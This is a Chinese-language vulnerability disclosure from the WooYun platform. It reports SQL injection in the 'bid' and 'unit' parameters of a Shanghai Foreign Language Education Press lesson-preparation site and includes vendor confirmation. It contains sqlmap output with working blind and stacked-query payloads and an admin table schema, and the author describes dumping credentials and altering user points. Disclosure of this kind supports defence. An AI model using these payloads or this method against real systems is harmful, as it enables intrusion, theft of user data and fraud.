漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0138223
漏洞标题:上海外语教育出版社某站漏洞可以刷积分
相关厂商:sflep.com
漏洞作者: 日出东方
提交时间:2015-09-01 11:21
修复时间:2015-10-16 11:44
公开时间:2015-10-16 11:44
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-09-01: 细节已通知厂商并且等待厂商处理中
2015-09-01: 厂商已经确认,细节仅向厂商公开
2015-09-11: 细节向核心白帽子及相关领域专家公开
2015-09-21: 细节向普通白帽子公开
2015-10-01: 细节向实习白帽子公开
2015-10-16: 细节向公众公开
简要描述:
121
详细说明:
上海外语教育出版社新理念外语备课中心。
参数bid unit 都有问题,其他地方没有测试。
十几万用户信息,还可以随意修改积分,话说一积分一块钱。。。
能不能让上个首页
漏洞证明:
盲注
sqlmap identified the following injection point(s) with a total of 58 HTTP(s) requests:
---
Parameter: bid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: bid=112 AND 3579=3579&unit=5
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: bid=112;WAITFOR DELAY '0:0:5'--&unit=5
---
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 4.0.30319, Nginx
back-end DBMS: Microsoft SQL Server 2000
sqlmap resumed the following injection point(s) from stored session:
Table: Admin
[7 columns]
+-----------+----------+
| Column | Type |
+-----------+----------+
| Account | nvarchar |
| AID | int |
| Email | nvarchar |
| LastLTime | datetime |
| LoginTime | datetime |
| Name | nvarchar |
| PassWord | nvarchar |
+-----------+----------+
dump账号密码,进入后台。
修改积分证明
修复方案:
补漏洞,修改密码。
版权声明:转载请注明来源 日出东方@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2015-09-01 11:42
厂商回复:
感谢提出漏洞:)
最新状态:
暂无